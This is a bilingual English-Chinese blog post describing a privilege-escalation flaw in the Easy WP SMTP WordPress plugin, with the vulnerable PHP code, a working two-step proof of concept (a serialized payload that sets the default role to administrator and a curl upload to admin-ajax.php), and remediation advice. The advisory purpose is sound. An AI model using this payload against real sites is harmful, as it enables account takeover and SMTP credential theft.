本文详细探讨了EasyWPSMTP插件中的零日漏洞,该漏洞可能导致网站被黑客利用,重定向到垃圾邮件或恶意软件网站。文章提供了概念验证攻击步骤,并指导如何通过更新插件、更改密码和检查网站来解决此问题。
wordpress 黑客
by Atman Rathod
由Atman Rathod
如何通过黑客删除WordPress重定向-查看Easy WP SMTP插件漏洞 (How to remove WordPress redirects by hackers — a look at the Easy WP SMTP plugin vulnerability)
I believe you would be offended if you found your website redirecting to a spam website, wouldn’t you? Alas! And you would even feel more snubbed if you had taken every preventive measure for your WordPress website. True? In this digital world, 30,000 websites are hacked daily and today might be your day. Thus, it becomes imperative to find a solution for the day of the attack.
我相信,如果您发现自己的网站重定向到垃圾邮件网站,将会感到冒犯,不是吗? 唉! 如果您对WordPress网站采取了所有预防措施,您甚至会感到冷落。 真正? 在这个数字世界中,每天有30,000个网站遭到黑客入侵,今天可能是您的日子。 因此,当务之急是为袭击之日找到解决方案。
To start with, you need to identify how the attacker was able to insert malicious code so that the website redirects to a phishing or malware website and grabs the traffic. Recently, when we faced the same issue we found that the hacker got access through the WP SMTP plugin.
首先,您需要确定攻击者如何插入恶意代码,以便网站重定向到网络钓鱼或恶意软件网站并捕获流量。 最近,当我们遇到相同的问题时,我们发现黑客可以通过WP SMTP插件进行访问。
The well-known Easy WP SMTP plugin that has 300k monthly active installations is prone to a zero-day vulnerability. It has given rights to an unknown user to access and modify the WordPress settings.
众所周知的Easy WP SMTP插件每月有30万次活动安装,容易出现零日漏洞。 它已授予未知用户访问和修改WordPress设置的权限。
“Almost 30% of online websites are developed in WordPress, making it the best content management system. However, if we look at the popularity shadow then it becomes the first choice for hackers.”
“几乎30%的在线网站都是使用WordPress开发的,使其成为最佳的内容管理系统。 但是,如果我们看一下流行阴影,那么它将成为黑客的首选。”
The Easy WP SMTP plugin is gaining popularity due to the zero-day (0-day) vulnerability unveiled recently. The plugin that has high download numbers has an even higher attack success rate. Prior to learning the solution, let’s learn about this plugin in detail.
Easy WP SMTP插件由于最近发现的零日(0天) 漏洞而变得越来越流行。 具有高下载数量的插件具有更高的攻击成功率。 在学习解决方案之前,让我们详细了解此插件。
Easy WP SMTP插件零日漏洞 (Easy WP SMTP Plugin Zero-Day Vulnerability)
Easy WP SMTP came into existence to make the email sending process easy from your WordPress website. It was successful even with its purpose of sending mail through SMTP instead of native wp_mail() function.
Easy WP SMTP的出现是为了简化WordPress网站的电子邮件发送过程。 即使其目的是通过SMTP而不是本机wp_mail()函数发送邮件,它也成功了。
Like other WordPress plugins, the Easy WP SMTP plugin has its administration page which enables you to specify data required for SMTP configuration. Along with this, there is a function to import and export settings, and that’s where the hacker can easily get in.
与其他WordPress插件一样,Easy WP SMTP插件具有其管理页面,该页面可让您指定SMTP配置所需的数据。 除此之外,还有导入和导出设置的功能,这是黑客可以轻松进入的位置。
Other than this, there are several more attack vectors that lead the attacker to the administrator level or to a sensitive data leak like SMTP credentials.
除此之外,还有更多攻击媒介将攻击者引导到管理员级别或SMTP凭据之类的敏感数据泄漏 。
Consider the following code:
考虑以下代码:
add_action( 'admin_init', array( $this, 'admin_init' ) );......function admin_init() { if ( defined( 'DOING_AJAX' ) && DOING_AJAX ) { add_action( 'wp_ajax_swpsmtp_clear_log', array( $this, 'clear_log' ) ); add_action( 'wp_ajax_swpsmtp_self_destruct', array( $this, 'self_destruct_handler' ) ); }//view log file if ( isset( $_GET[ 'swpsmtp_action' ] ) ) { if ( $_GET[ 'swpsmtp_action' ] === 'view_log' ) { $log_file_name = $this->opts[ 'smtp_settings' ][ 'log_file_name' ]; if ( ! file_exists( plugin_dir_path( __FILE__ ) . $log_file_name ) ) { if ( $this->log( "Easy WP SMTP debug log file\r\n\r\n" ) === false ) { wp_die( 'Can\'t write to log file. Check if plugin directory (' . plugin_dir_path( __FILE__ ) . ') is writeable.' ); }; } $logfile = fopen( plugin_dir_path( __FILE__ ) . $log_file_name, 'rb' ); if ( ! $logfile ) { wp_die( 'Can\'t open log file.' ); } header( 'Content-Type: text/plain' ); fpassthru( $logfile ); die; } }//check if this is export settings request $is_export_settings = filter_input( INPUT_POST, 'swpsmtp_export_settings', FILTER_SANITIZE_NUMBER_INT ); if ( $is_export_settings ) { $data = array(); $opts = get_option( 'swpsmtp_options', array() ); $data[ 'swpsmtp_options' ] = $opts; $swpsmtp_pass_encrypted = get_option( 'swpsmtp_pass_encrypted', false ); $data[ 'swpsmtp_pass_encrypted' ] = $swpsmtp_pass_encrypted; if ( $swpsmtp_pass_encrypted ) { $swpsmtp_enc_key = get_option( 'swpsmtp_enc_key', false ); $data[ 'swpsmtp_enc_key' ] = $swpsmtp_enc_key; } $smtp_test_mail = get_option( 'smtp_test_mail', array() ); $data[ 'smtp_test_mail' ] = $smtp_test_mail; $out = array(); $out[ 'data' ] = serialize( $data ); $out[ 'ver' ] = 1; $out[ 'checksum' ] = md5( $out[ 'data' ] );$filename = 'easy_wp_smtp_settings.txt'; header( 'Content-Disposition: attachment; filename="' . $filename . '"' ); header( 'Content-Type: text/plain' ); echo serialize( $out ); exit; }$is_import_settings = filter_input( INPUT_POST, 'swpsmtp_import_settings', FILTER_SANITIZE_NUMBER_INT ); if ( $is_import_settings ) { $err_msg = __( 'Error occurred during settings import', 'easy-wp-smtp' ); if ( empty( $_FILES[ 'swpsmtp_import_settings_file' ] ) ) { echo $err_msg; wp_die(); } $in_raw = file_get_contents( $_FILES[ 'swpsmtp_import_settings_file' ][ 'tmp_name' ] ); try { $in = unserialize( $in_raw ); if ( empty( $in[ 'data' ] ) ) { echo $err_msg; wp_die(); } if ( empty( $in[ 'checksum' ] ) ) { echo $err_msg; wp_die(); } if ( md5( $in[ 'data' ] ) !== $in[ 'checksum' ] ) { echo $err_msg; wp_die(); } $data = unserialize( $in[ 'data' ] ); foreach ( $data as $key => $value ) { update_option( $key, $value ); } set_transient( 'easy_wp_smtp_settings_import_success', true, 60 * 60 ); $url = admin_url() . 'options-general.php?page=swpsmtp_settings'; wp_safe_redirect( $url ); exit; } catch ( Exception $ex ) { echo $err_msg; wp_die(); } }}When the user wants to enter the admin area, the function admin_init() in the script easy-wp-smtp.php is called via the admin_init hook. This helps the admin to edit each and every function, from adding or deleting the log to importing or exporting the plugin configuration in the WordPress database.
当用户想要进入管理区域时,可通过admin_init钩子调用脚本easy-wp-smtp.php中的函数admin_init()。 这有助于管理员编辑每个功能,从添加或删除日志到在WordPress数据库中导入或导出插件配置。
When you call the function it does not check the user capability and therefore any logged-in user can trigger it. The limitation here is that it can be implemented by any unauthenticated users, as the Easy WP SMTP is built using AJAX and admin_init hook can also be implemented on admin-ajax.php as described in the WordPress API docs.
当您调用该功能时,它不会检查用户功能,因此任何登录的用户都可以触发它。 这里的限制是它可以由任何未经身份验证的用户实现,因为Easy WP SMTP是使用AJAX构建的,并且admin_init钩子也可以按照WordPress API文档中的说明在admin-ajax.php上实现。
So now an unauthenticated user can easily send an AJAX request, for example action=swpsmtp_clear_log, to call the above function and run the code.
因此,现在,未经身份验证的用户可以轻松发送AJAX请求,例如action = swpsmtp_clear_log,以调用上述函数并运行代码。
Therefore, to safeguard your website, we recommend that you always update the Easy WP SMTP plugin to the latest version available.
因此,为了保护您的网站,我们建议您始终将Easy WP SMTP插件更新为可用的最新版本 。
注意概念证明 (Note The Proof Of Concept)
The following two-step proof of concept allows you to create a user ID where you can get access to admin and make the changes to remove the malware code. In short, it allows you to take complete control over the website.
以下两步的概念验证使您可以创建用户ID,从中可以访问admin并进行更改以删除恶意软件代码。 简而言之,它使您可以完全控制该网站。
Here, you need to use swpsmtp_import_settings in order to upload a file that has a malicious serialized payload. This file helps the user register and set the default role to “administrator” in the database.
在这里,您需要使用swpsmtp_import_settings来上传具有恶意序列化有效负载的文件。 此文件可帮助用户在数据库中注册并将默认角色设置为“管理员”。
1. Create a file with name “/tmp/upload.txt” and add this content to it:
1.创建一个名称为“ /tmp/upload.txt”的文件,并将以下内容添加到其中:
a:2:{s:4:”data”;s:81:”a:2:{s:18:”users_can_register”;s:1:”1";s:12:”default_role”;s:13:”administrator”;}”;s:8:”checksum”;s:32:”3ce5fb6d7b1dbd6252f4b5b3526650c8";}2. Upload the file:
2.上传文件:
$ curl https://VICTIM.COM/wp-admin/admin-ajax.php -F ‘action=swpsmtp_clear_log’ -F ‘swpsmtp_import_settings=1’ -F ‘swpsmtp_import_settings_file=@/tmp/upload.txt’Other details you need to pay attention to:
您需要注意的其他细节:
- Take care of Remote Code Execution via PHP Object Injection, as Easy WP SMTP runs using unsafe unserialize() calls. 由于Easy WP SMTP使用不安全的unserialize()调用运行,因此请注意通过PHP对象注入进行远程代码执行。
- Mark on different logs as the hacker can change the log filename. 标记不同的日志,因为黑客可以更改日志文件名。
- By exporting the plugin configuration that includes SMTP host, username, and password, the hacker can use it to send spam emails. 通过导出包含SMTP主机,用户名和密码的插件配置,黑客可以使用它来发送垃圾邮件。
删除恶意软件WordPress重定向的步骤 (Steps To Remove Malware WordPress Redirects)
- Change passwords and check registered users 更改密码并检查注册用户
- Find and remove the unwanted plugins and themes from the website 在网站上查找并删除不需要的插件和主题
- Check the website completely with appropriate tools 使用适当的工具彻底检查网站
- Find the right WordPress plugin to scan your website files 找到合适的WordPress插件来扫描您的网站文件
- Thoroughly check all the impacted files 彻底检查所有受影响的文件
- Reinstall your WordPress files, plugins, and themes 重新安装您的WordPress文件,插件和主题
- Resubmit the website to Google 将网站重新提交给Google
其他重要建议 (Other Important Recommendations)
If you are using the old version of Easy WP SMTP plugin, check the following things:
如果您使用的是Easy WP SMTP插件的旧版本,请检查以下内容:
- Check the Settings Page and ensure nothing is flawed from URL to User default role. 检查“设置”页面,确保从URL到用户默认角色的所有内容都没有问题。
- Check for new Admin accounts, email addresses and more. 检查新的管理员帐户,电子邮件地址等。
- Change all passwords 更改所有密码
- Change your SMTP password too, as the hackers may now have the password. 还要更改您的SMTP密码,因为黑客现在可能已经有了该密码。
- Install a web application firewall for better security. 安装Web应用程序防火墙以提高安全性。
- Ensure you don’t install plugins or themes that are not known 确保您不安装未知的插件或主题
- Update all your themes and plugins monthly 每月更新所有主题和插件
- Make sure the installation of WordPress is regularly backed up 确保定期备份WordPress的安装
If required, change the web host to one that has better WordPress security.
如果需要,将虚拟主机更改为具有更好WordPress安全性的虚拟主机。
wordpress 黑客
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
